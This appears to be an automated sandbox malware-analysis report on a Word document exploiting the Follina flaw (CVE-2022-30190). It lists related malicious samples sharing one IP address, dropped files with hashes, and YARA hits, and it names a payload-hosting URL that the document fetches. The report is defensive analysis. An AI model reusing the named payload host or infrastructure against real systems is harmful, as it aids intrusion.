                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              XBtHx41Ruc.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              d67taAtF6k.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              Fafp1MozEr.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19A.W.Chesterton PEDIDO DE COMPRA TTY56,pdf.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              SmartAlertsSetup.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              SmartAlertsSetup.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              uvGbZYD1Lb.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              Dqc1yAO8eA.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              xapcmRIAlA.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              C1ZGt61uGv.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              FzgkVbUkUm.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              YccRHfFd3T.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              dl18aYTBo5.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              wWLwoD14Xo.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              ZZkLH4O0Y3.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              dfqqRjnCV5.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              uaMVRwwuyZ.docxGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              Voicemail Audio Transcription.htmGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              https://qsinet-my.sharepoint.com/:f:/g/personal/psg-president_bratislava_qsi_org/EnFNEJXRAKFCtd-FKWV3uzQBTjm7ODr0PXuior0gvBUXAA?e=1zr4UlGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              attached invoice.htmlGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              #U260e voice042456432-121_076_454656_3-2(4).htmlGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              3GgEhpsURO.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79
                                                                                                                                                              Facturas Pagadas al VencimientoPDF.exeGet hashmaliciousBrowse
                                                                                                                                                              • 143.198.109.79

                                                                                                                                                              Dropped Files

                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                              C:\Windows\Temp\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c\DiagPackage.dllicRTA4gcSe.docxGet hashmaliciousBrowse
                                                                                                                                                                order.docxGet hashmaliciousBrowse
                                                                                                                                                                  Court Fine.docGet hashmaliciousBrowse
                                                                                                                                                                    20220714 DWG.docGet hashmaliciousBrowse
                                                                                                                                                                      purchase order.xlsxGet hashmaliciousBrowse
                                                                                                                                                                        WF0SlQWKr1.docxGet hashmaliciousBrowse
                                                                                                                                                                          V3g2Pfu707.docxGet hashmaliciousBrowse
                                                                                                                                                                            5YMh6S8QVr.docxGet hashmaliciousBrowse
                                                                                                                                                                              ZDhoKQk8G6.docxGet hashmaliciousBrowse
                                                                                                                                                                                TranQuangDai.docxGet hashmaliciousBrowse
                                                                                                                                                                                  doc782.docxGet hashmaliciousBrowse
                                                                                                                                                                                    68101181_048154.imgGet hashmaliciousBrowse
                                                                                                                                                                                      doc782.docxGet hashmaliciousBrowse
                                                                                                                                                                                        doc1712.docxGet hashmaliciousBrowse
                                                                                                                                                                                          R346ltaP9w.rtfGet hashmaliciousBrowse
                                                                                                                                                                                            VIP Invitation to Doha Expo 2023.docxGet hashmaliciousBrowse
                                                                                                                                                                                              WykHEO9BQN.rtfGet hashmaliciousBrowse
                                                                                                                                                                                                lol666 (2).batGet hashmaliciousBrowse
                                                                                                                                                                                                  EISPv0c56U.docGet hashmaliciousBrowse
                                                                                                                                                                                                    mjpoc_slide.docGet hashmaliciousBrowse

                                                                                                                                                                                                      Created / dropped Files

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.accdb

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:Microsoft Access Database
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):528384
                                                                                                                                                                                                      Entropy (8bit):0.4756525200728469
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:384:sGfXgDJCOs8SFwfZ0jGBsUvYFcWRfwtZ1Ir+hVZO4Fg:XfXwCVHgZiIcfRf/YI
                                                                                                                                                                                                      MD5:4276AA05788066834944A23FDEEAADEE
                                                                                                                                                                                                      SHA1:BE9A0B51E09AB98BD548518F69E4BB1298BABC8A
                                                                                                                                                                                                      SHA-256:CC5F605F42E97229A867E727CF5CBDC5093C27E472527D296E67D06A45C1F07E
                                                                                                                                                                                                      SHA-512:19F7830DAD3624E9D4F7BF2669AAD9583C2083E67DA10EAB8525A7BB68E82D4A07F6D5379E242C61645D65386B03FBD0916A3C560DFE5A2896597D8ADD741686
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:....Standard ACE DB......n.b`..U.gr@?..~.....1.y..0...c...F...NqU.7...1.(....`.:{6....Z.C8..3..y[e.|*..|......-....f_...$.g..'D...e....F.x....-b.T...4.0.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.ini

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):36
                                                                                                                                                                                                      Entropy (8bit):2.730660070105504
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:5NixJlElGUR:WrEcUR
                                                                                                                                                                                                      MD5:1F830B53CA33A1207A86CE43177016FA
                                                                                                                                                                                                      SHA1:BDF230E1F33AFBA5C9D5A039986C6505E8B09665
                                                                                                                                                                                                      SHA-256:EAF9CDC741596275E106DDDCF8ABA61240368A8C7B0B58B08F74450D162337EF
                                                                                                                                                                                                      SHA-512:502248E893FCFB179A50863D7AC1866B5A466C9D5781499EBC1D02DF4F6D3E07B9E99E0812E747D76734274BD605DAD6535178D6CE06F08F1A02AB60335DE066
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:C.e.n.t.r.a.l.T.a.b.l.e...a.c.c.d.b.

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\OfficeFileCache\CentralTable.laccdb

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):64
                                                                                                                                                                                                      Entropy (8bit):1.4172860556164644
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:lrfFvaV:pNu
                                                                                                                                                                                                      MD5:1606887518E2BDE3B75C37FE72E29138
                                                                                                                                                                                                      SHA1:A348F3B8B3162EE8BB1B29B429FF9ABDB2B3B94E
                                                                                                                                                                                                      SHA-256:435C8B933EE5E8CC0D0C14AF682780F20249928A3F26DB0747E7AFFA915B9B3D
                                                                                                                                                                                                      SHA-512:77B537019E6957B4394362BB98FFD8D4D30779401BB2191E5F3D45D2F26F5E8CF52264608EC3CE28493480827C7FEEF16186C12ECDFEF061C23D635D32274087
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:910646. Admin.

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\616A64AB-67DB-4EDF-90AA-ACD416B09C2C

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):148061
                                                                                                                                                                                                      Entropy (8bit):5.35815775838772
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:1536:xcQW/gxgB5BQguwN/Q9DQe+zQTk4F77nXmvid3XxVETLKz61:I1Q9DQe+zuXYr
                                                                                                                                                                                                      MD5:B783C72E2293B61E5F09680717F02852
                                                                                                                                                                                                      SHA1:33D74EDD5B0D7CE065E552484B42775E81D2AA43
                                                                                                                                                                                                      SHA-256:66DD5E719DBCBAD6664F2EA89D9317B51E627D709D757DFDD9F955C1E2B1DFB9
                                                                                                                                                                                                      SHA-512:174800A869C136D73EFF92D2EDB87C0DE0AC1E15221779E0818B4910086973DD06F237ED3CC71E7442B10A69097C700597C9EAD2101376B65318CD87012F3C22
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2022-08-18T06:34:43">.. Build: 16.0.15614.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):7056
                                                                                                                                                                                                      Entropy (8bit):1.1561718807594425
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:0Wr/HdlR1N7cGkLnPKZ2kt8HqCkEvNu4SYMW:0Wr/ddUPyNnEFu4SPW
                                                                                                                                                                                                      MD5:B92EE400BE1F2612B4138031DFC5881E
                                                                                                                                                                                                      SHA1:322065E52393CC668A77A0EB76F33EEC191CC668
                                                                                                                                                                                                      SHA-256:8918EDE0A38D40EE0B89028819DCAAC6BB73D2280AD88EA2E1D0A42FD7101AA6
                                                                                                                                                                                                      SHA-512:B33D22C2C3951BF8403E3B8FB13BEB8614BF8EF743344BA944D119FE1DD67D61BDEB78964639B99346E6B8045E517A023FECB8A29665E31F26E70BDCC6B9732B
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                                      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\CCAB4A43.htm, Author: Joe Security
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):7056
                                                                                                                                                                                                      Entropy (8bit):1.1561718807594425
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:0Wr/HdlR1N7cGkLnPKZ2kt8HqCkEvNu4SYMW:0Wr/ddUPyNnEFu4SPW
                                                                                                                                                                                                      MD5:B92EE400BE1F2612B4138031DFC5881E
                                                                                                                                                                                                      SHA1:322065E52393CC668A77A0EB76F33EEC191CC668
                                                                                                                                                                                                      SHA-256:8918EDE0A38D40EE0B89028819DCAAC6BB73D2280AD88EA2E1D0A42FD7101AA6
                                                                                                                                                                                                      SHA-512:B33D22C2C3951BF8403E3B8FB13BEB8614BF8EF743344BA944D119FE1DD67D61BDEB78964639B99346E6B8045E517A023FECB8A29665E31F26E70BDCC6B9732B
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                                      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\EF858049.htm, Author: Joe Security
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{0800C0BA-0F06-42ED-8402-C51D05A98713}.tmp

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1024
                                                                                                                                                                                                      Entropy (8bit):0.05390218305374581
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:ol3lYdn:4Wn
                                                                                                                                                                                                      MD5:5D4D94EE7E06BBB0AF9584119797B23A
                                                                                                                                                                                                      SHA1:DBB111419C704F116EFA8E72471DD83E86E49677
                                                                                                                                                                                                      SHA-256:4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
                                                                                                                                                                                                      SHA-512:95F83AE84CAFCCED5EAF504546725C34D5F9710E5CA2D11761486970F2FBECCB25F9CF50BBFC272BD75E1A66A18B7783F09E1C1454AFDA519624BC2BB2F28BA4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.Word\~WRS{D36977B3-ADC1-4109-A787-B8962B69C0CF}.tmp

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1536
                                                                                                                                                                                                      Entropy (8bit):0.7710450912559451
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:3:5lsl4/I5lNVRIYk/lElXlAPlMOau+2lT8M1nRF5Zfdkl5XHlRtp/gdl/ABdllqPe:olgI5lNcYWeuPa+ejJoYB4PxZUtLsmN
                                                                                                                                                                                                      MD5:DF555F2BD2F7953B785FBD5C2EC880ED
                                                                                                                                                                                                      SHA1:EC5BBE67F462283F60964E804FEA21BE05DEDE5E
                                                                                                                                                                                                      SHA-256:B5E66DC74C4F74A231454D7843C6A8E9B6DFF18E51AF4590CC460FE9E5373E6D
                                                                                                                                                                                                      SHA-512:E2C31A4890ECD7B809D27DF505BAD97BD9B5BF7A7F5900C07F81705221FFCD13F949A57E8DBC5D07E025FE2778DC37F75346D24CEE342C1316FFC493632C95E4
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:..L.I.N.K. .h.t.m.l.f.i.l.e. .".h.t.t.p.s.:././.w.w.w...m.a.l.w.a.r.e.j.a.k.e...c.o.m./.4.5.6...h.t.m.l.!.". .".". .\.p. .\.f. .0..... . .........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................j....U

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\WINWORD.EXE
                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                      Size (bytes):7056
                                                                                                                                                                                                      Entropy (8bit):1.1561718807594425
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:0Wr/HdlR1N7cGkLnPKZ2kt8HqCkEvNu4SYMW:0Wr/ddUPyNnEFu4SPW
                                                                                                                                                                                                      MD5:B92EE400BE1F2612B4138031DFC5881E
                                                                                                                                                                                                      SHA1:322065E52393CC668A77A0EB76F33EEC191CC668
                                                                                                                                                                                                      SHA-256:8918EDE0A38D40EE0B89028819DCAAC6BB73D2280AD88EA2E1D0A42FD7101AA6
                                                                                                                                                                                                      SHA-512:B33D22C2C3951BF8403E3B8FB13BEB8614BF8EF743344BA944D119FE1DD67D61BDEB78964639B99346E6B8045E517A023FECB8A29665E31F26E70BDCC6B9732B
                                                                                                                                                                                                      Malicious:true
                                                                                                                                                                                                      Yara Hits:
                                                                                                                                                                                                      • Rule: SUSP_PS1_Msdt_Execution_May22, Description: Detects suspicious calls of msdt.exe as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm, Author: Nasreddine Bencherchali, Christian Burkard
                                                                                                                                                                                                      • Rule: EXPL_Follina_CVE_2022_30190_Msdt_MSProtocolURI_May22, Description: Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm, Author: Tobias Michalski, Christian Burkard
                                                                                                                                                                                                      • Rule: JoeSecurity_Follina, Description: Yara detected Microsoft Office Exploit Follina / CVE-2022-30190, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\2WF3MMUU\456[1].htm, Author: Joe Security
                                                                                                                                                                                                      Antivirus:
                                                                                                                                                                                                      • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                      IE Cache URL:https://www.malwarejake.com/456.html
                                                                                                                                                                                                      Preview:<!doctype html>..<html lang="en">..<body>..<script>..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA..//AAAAAAAAA

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES2066.tmp

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1364
                                                                                                                                                                                                      Entropy (8bit):4.109227188287232
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:H0iC9A++f8dWDfHpFhKRVg5fII+ycuZhNJakSHPNnq9Wd:pxcsBKTg5g1ulJa3Vq9m
                                                                                                                                                                                                      MD5:5A0990F40A5444A25E5FD9960BAB9D5A
                                                                                                                                                                                                      SHA1:AA98D6AD1621385FD84DAF65E2D8DC5F34868E86
                                                                                                                                                                                                      SHA-256:120788C51662671D9850960A7B00C1E19DEFCB6AE28E82E388FF4362F0488FA0
                                                                                                                                                                                                      SHA-512:6C814F6A03F54474999B1B605AA21F2688544C759C05BB587EC5BAF710DA25EBF0D52C182403AE9D3FE1FD8DD761C038122CACD645537FEEB51C2CD0ADEB716D
                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                      Preview:L......b.............debug$S........p...................@..B.rsrc$01........X.......T...........@..@.rsrc$02........P...^...............@..@........T....c:\Users\user\AppData\Local\Temp\md5akkd2\CSC5A96336FDD91418583C44D4183EDFF63.TMP.................i1..).N=................4.......C:\Users\user\AppData\Local\Temp\RES2066.tmp.-.<...................'...Microsoft (R) CVTRES...=..cwd.C:\Windows\TEMP\SDIAG_4c029c1e-7995-47bb-b731-778fea2bf65c.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe...............................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.d.5.a.k.k.d.2...d.l.l.....(.....L.e.g.a.l.C.o.p.

                                                                                                                                                                                                      C:\Users\user\AppData\Local\Temp\RES67B5.tmp

                                                                                                                                                                                                      Download File
                                                                                                                                                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                                                                                                      File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x4ae, 9 symbols
                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                      Size (bytes):1364
                                                                                                                                                                                                      Entropy (8bit):4.109205847717311
                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                      SSDEEP:24:H1iC9AWZfODfHHhKRVg5fII+ycuZhNnakSJPNnq9Wd:KWB0hKTg5g1ulna3rq9m
                                                                                                                                                                                                      MD5:C5E789955217380A4DB3F09DE237D648
                                                                                                                                                                                                      SHA1:4887CC9110AA8963503EB88D20463309ED48DFF2
